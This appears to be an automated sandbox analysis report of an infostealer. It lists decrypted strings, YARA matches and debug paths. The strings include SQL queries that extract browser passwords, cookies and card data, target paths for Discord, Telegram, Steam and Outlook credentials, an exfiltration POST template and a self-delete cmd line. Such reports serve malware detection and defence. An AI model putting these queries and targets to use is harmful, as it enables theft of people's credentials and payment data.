                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RmStartSession
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RmRegisterResources
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RmGetList
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: RmEndSession
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_open
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_step
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_column_text
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_finalize
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_close
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3_column_blob
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: encrypted_key
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PATH
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: NSS_Init
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: NSS_Shutdown
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PK11_FreeSlot
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PK11_Authenticate
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: C:\ProgramData\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: browser:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: profile:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: url:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: login:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: password:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Opera
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: OperaGX
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Network
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: cookies
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: .txt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: TRUE
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: FALSE
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: autofill
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: history
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: name:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: month:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: year:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: card:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Cookies
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Login Data
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Web Data
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: History
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: logins.json
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: formSubmitURL
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: usernameField
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: encryptedUsername
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: encryptedPassword
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: guid
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: cookies.sqlite
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: formhistory.sqlite
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: places.sqlite
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: plugins
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Local Extension Settings
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Sync Extension Settings
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: IndexedDB
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Opera Stable
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Opera GX Stable
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: CURRENT
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: chrome-extension_
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Local State
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: profiles.ini
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: chrome
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: opera
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: firefox
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: wallets
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ProductName
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ProcessorNameString
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DisplayName
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DisplayVersion
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Network Info:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - IP: IP?
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Country: ISO?
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: System Summary:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - HWID:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - OS:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Architecture:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - UserName:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Computer Name:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Local Time:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - UTC:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Language:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Keyboards:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Laptop:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Running Path:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - CPU:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Threads:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Cores:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - RAM:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - Display Resolution:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: - GPU:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: User Agents:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Installed Apps:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: All Users:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Current User:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Process List:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: system_info.txt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: freebl3.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: mozglue.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: msvcp140.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: nss3.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: softokn3.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: vcruntime140.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Temp\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: .exe
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: runas
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: open
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: /c start
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %DESKTOP%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %APPDATA%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %USERPROFILE%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %DOCUMENTS%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %PROGRAMFILES%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: %RECENT%
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: *.lnk
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: files
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \discord\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Telegram Desktop\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: key_datas
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: map*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Telegram
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: *.tox
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: *.ini
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Password
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: 00000001
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: 00000002
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: 00000003
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: 00000004
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Pidgin
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \.purple\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: accounts.xml
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: token:
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Software\Valve\Steam
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: SteamPath
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \config\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ssfn*
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: config.vdf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DialogConfig.vdf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: libraryfolders.vdf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: loginusers.vdf
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Steam\
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: sqlite3.dll
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: browsers
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: done
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: soft
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: https
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: POST
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: HTTP/1.1
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: hwid
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: build
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: token
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: file_name
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: file
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: message
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                          Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpackString decryptor: screenshot.jpg
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00409540
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004155A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00406C10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_004094A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,1_2_0040BF90
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BB86C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6BB86C80
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C8BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6C8BA9A0
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001D4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_001D4280
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_001D45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,2_2_001D45A0

                          Exploits

                          barindex
                          Source: Yara matchFile source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.2506109737.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: run.exe PID: 2652, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: run.exe PID: 8096, type: MEMORYSTR

                          Compliance

                          barindex
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeUnpacked PE file: 0.2.wxfSIz4PAi.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeUnpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack
                          Source: wxfSIz4PAi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 195.181.163.193:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920960862.000002727C8E0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: mozglue.pdb source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
